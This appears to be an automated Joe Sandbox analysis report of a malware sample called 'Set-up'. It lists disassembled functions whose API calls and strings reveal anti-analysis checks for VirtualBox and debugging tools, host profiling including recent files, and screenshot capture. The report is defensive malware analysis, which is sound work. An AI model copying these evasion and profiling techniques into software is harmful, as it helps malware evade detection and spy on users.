String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: 669e06ab8ec716914311125ee5476f3e00becf10a667b133595bb4837a5cea10
Instruction ID: 6d645f98e4e0798d4a06bd4651950414e7194a1a334887648e01b6626d5eb579
Opcode Fuzzy Hash: 669e06ab8ec716914311125ee5476f3e00becf10a667b133595bb4837a5cea10
Instruction Fuzzy Hash: 4362E171508340ABE7288F24C846BAAB7E8FFD5314F044529F988D7292E771E985CBD3

Function 008029FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00802A27
RegOpenKeyExA.KERNELBASE ref: 00802A8A
CharUpperA.USER32 ref: 00802AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00802B6D
Process32First.KERNEL32 ref: 00802B88
Process32Next.KERNEL32 ref: 00802BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00802C26
CloseHandle.KERNELBASE ref: 00802C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00802CC4
Process32First.KERNEL32 ref: 00802CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00802D90
Process32Next.KERNEL32 ref: 00802DBF
CloseHandle.KERNELBASE ref: 00802DFC
EnumWindows.USER32 ref: 00802E21

Strings

C:\USERS\PUBLIC\, xrefs: 00802AF4
wireshark.exe, xrefs: 00802D31
dbg, xrefs: 00802C80
ida.exe, xrefs: 00802D7F
0, xrefs: 00802DA9
x64dbg.exe, xrefs: 00802D65
dbg_third, xrefs: 00802E48
vbox_second, xrefs: 00802AAB
public_check, xrefs: 00802B26
vbox_first, xrefs: 00802A49
yadro, xrefs: 00802EFB
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00802A76
procmon.exe, xrefs: 00802D4B
C:\Windows\System32\VBox*.dll, xrefs: 00802A1B
dbg_sec, xrefs: 00802DDE
WINDBG.EXE, xrefs: 00802C4E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: 312c5fe4ead15b17354f30b249a58009b74b4dcc94b13a4fee97a619f856d42b
Instruction ID: 4b09a74185cad76e605cb3c6e4ba120ffbf5c20fe00ca21a93d6dcb65a9470e9
Opcode Fuzzy Hash: 312c5fe4ead15b17354f30b249a58009b74b4dcc94b13a4fee97a619f856d42b
Instruction Fuzzy Hash: 65E1F5B49053099FCB50EF69D98969DBBF4EF45304F4088A9E888DB390E774D989CF42

Function 0080255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00802579

Part of subcall function 00C929F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00802589), ref: 00C92A05

GlobalMemoryStatusEx.KERNELBASE ref: 008025CC
GetLogicalDriveStringsA.KERNEL32 ref: 00802619
GetDriveTypeA.KERNELBASE ref: 00802647
GetDiskFreeSpaceExA.KERNELBASE ref: 0080267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802749
KiUserCallbackDispatcher.NTDLL ref: 008027E2
SHGetKnownFolderPath.SHELL32 ref: 0080286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 008028BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 008028D4
FindFirstFileW.KERNELBASE ref: 008028F8
FindNextFileW.KERNELBASE ref: 0080291F
K32EnumProcesses.KERNEL32 ref: 0080296F

Strings

Num_processor, xrefs: 0080258D
uptime_minutes, xrefs: 008029E4
processes, xrefs: 00802996
Num_ram, xrefs: 008025F0
resolution_x, xrefs: 0080280D
@, xrefs: 008025B4
Num_displays, xrefs: 008027C3
drivers, xrefs: 00802769
free, xrefs: 0080271E
all, xrefs: 008026E0
`, xrefs: 008029BC
resolution_y, xrefs: 0080282F
name, xrefs: 008026A2
recent_files, xrefs: 00802941

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: c9b468900dbe4f6f4b8d64a0c6cd631d030c36e25311cd5168c0f5e5f50e9616
Instruction ID: ae0371905a61bdc713c915053eb3fd66949015a49f0894e6cc79f9b0dbf63e6a
Opcode Fuzzy Hash: c9b468900dbe4f6f4b8d64a0c6cd631d030c36e25311cd5168c0f5e5f50e9616
Instruction Fuzzy Hash: F2D1D7B49053089FCB50EF68C98569EBBF0FF44344F008969E898E7351E7749A85DF92

Function 00B98D8A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00B98DCF
GetProcAddress.KERNEL32 ref: 00B98DF3
GetProcAddress.KERNEL32 ref: 00B98E09
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B98FEF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99010
FreeLibrary.KERNEL32 ref: 00B99018

Part of subcall function 00B97E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B97E6D
Part of subcall function 00B97E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B97EB6
Part of subcall function 00B97E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B97ED8

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99097
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990B8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990CF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B990F0
FreeLibrary.KERNEL32 ref: 00B990F8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99117
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B99138
FreeLibrary.KERNEL32 ref: 00B99140

Strings

image/jpeg, xrefs: 00B98E54
gdiplus.dll, xrefs: 00B98DC8
Failed to get JPEG encoder CLSID, xrefs: 00B99131
Failed to create GDI+ bitmap, xrefs: 00B99009
GdipCreateBitmapFromHBITMAP, xrefs: 00B98DE8
Failed to load gdiplus.dll, xrefs: 00B990B1
Failed to allocate buffer, xrefs: 00B99238
!, xrefs: 00B9911D
Failed to load GDI+ functions, xrefs: 00B990E9
GdipSaveImageToStream, xrefs: 00B98DFE

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
API String ID: 4185073593-1943330374
Opcode ID: 21efdb078e5f3491e7945f6f48913a9c24bd23bb4156ed7a38e7834205dff9c5
Instruction ID: 6c4d7b1371486aa161b42071e87b8b0fa6910572c11e17005132d7dfea1b87f0
Opcode Fuzzy Hash: 21efdb078e5f3491e7945f6f48913a9c24bd23bb4156ed7a38e7834205dff9c5
Instruction Fuzzy Hash: EB5143B49093049FDB50AF69D84835EBBF0FF85314F0188ADE89897251EB799889CF43

Function 008CAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 008CAAE8
htons.WS2_32(?), ref: 008CAB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 008CAB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 008CABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 008CAC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 008CAC29
htonl.WS2_32(00000000), ref: 008CAC69
bind.WS2_32(?,00000017,0000001C), ref: 008CACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 008CACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 008CAD20
WSAGetLastError.WS2_32 ref: 008CADB5
closesocket.WS2_32(?), ref: 008CAE6F

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: e17a24c34962e2ad6b6f9081a72b12dc86038650abc39d9537401a5f70a0e5f1
Instruction ID: 9e74626d3ec0baa6989b69a94f2f9c85d93805c1750bb07e29b20d4f57b2b6d8
Opcode Fuzzy Hash: e17a24c34962e2ad6b6f9081a72b12dc86038650abc39d9537401a5f70a0e5f1
Instruction Fuzzy Hash: 67E1AD746003099FEB288F24D884F6AB7B5FF88318F044A2CF999DB291D775D944CB92

Function 0080116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 008011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
GetStartupInfoA.KERNEL32 ref: 00801433

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 3132690e242c9e30c6182f67b1c2dd231f287c36a77b604daec4a31191664e4d
Instruction ID: b580eab86eeab4de5fe9a27c219f6241d3273e649e1a66761edb9bb4a7813b3b
Opcode Fuzzy Hash: 3132690e242c9e30c6182f67b1c2dd231f287c36a77b604daec4a31191664e4d
Instruction Fuzzy Hash: 86819DB1A083088FDF54EF65ED893697BE1FB44314F00442DD985EB3A1DB75A849CB82

Function 00B88E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00B88EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B88EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B88F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00B88F59

Strings

@, xrefs: 00C9A6E1
terminated, xrefs: 00B88F20
CONOUT$, xrefs: 00B88EA6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: dc761a054bbea0350f80fc633b0e6d14a4ab917ceb03d89cc17d060133deda80
Instruction ID: 16c03499dbfb2985318d200d33d497a96f08b3f041744cbd3374c92cdee7291d
Opcode Fuzzy Hash: dc761a054bbea0350f80fc633b0e6d14a4ab917ceb03d89cc17d060133deda80
Instruction Fuzzy Hash: EA415BB09083059FCB00EFB9D84966EBBF0EF48314F408A6DE854D7260E734D945CB96

Function 00C90730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 00C908A9

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: e2cfb6c8b10a742966fd06a6769a053767d0e9e3d8c9552ec4dc334555469c56
Instruction ID: 9e01e6b524dbde8cf297182b79ad91c7a603e5b091015562ec0dea918c73195a
Opcode Fuzzy Hash: e2cfb6c8b10a742966fd06a6769a053767d0e9e3d8c9552ec4dc334555469c56
Instruction Fuzzy Hash: 8B41C4B59093019FCB00EF79D58961ABBE0AB88314F408E6DF898D7364E774D589CF82

Function 008105B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00810711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00810783
WSAWaitForMultipleEvents.WS2_32(00000001,00803EBE,00000000,00000000,00000000), ref: 0081086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008108EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00810934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008109DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008109FB
WSAResetEvent.WS2_32(8508C483), ref: 00810A1F

Strings

multi.c, xrefs: 008107B2

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: 43f3bdbba4865c0a14134f8c4692b79f1c0114fc5576689b7c6656d8bcc4e450
Instruction ID: 2ef4ee963410370c960052420120bf77719ae4d6e37c0877218a4e0d4944d5eb
Opcode Fuzzy Hash: 43f3bdbba4865c0a14134f8c4692b79f1c0114fc5576689b7c6656d8bcc4e450
Instruction Fuzzy Hash: DFD17B756083059BE7108F64CC81BAABBE9FF94308F04482CF885D6292E7B5E9D5CF52

Function 00816FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00817010

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 499d69d0a434f1ed214879c3956a9defb603e046a3a28390d3542018b48fb2f2
Instruction ID: 137dea8bd3e36bb73b8e910a3d1edfbd6e1f59f4bc6fea55a9e32653a3b0fa64
Opcode Fuzzy Hash: 499d69d0a434f1ed214879c3956a9defb603e046a3a28390d3542018b48fb2f2
Instruction Fuzzy Hash: EF91E3306087499BD7358A2988847FA72F9FFC4324F548A2CE8AAC31D4EB709DC1D681

Function 008011A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 008011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080140C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
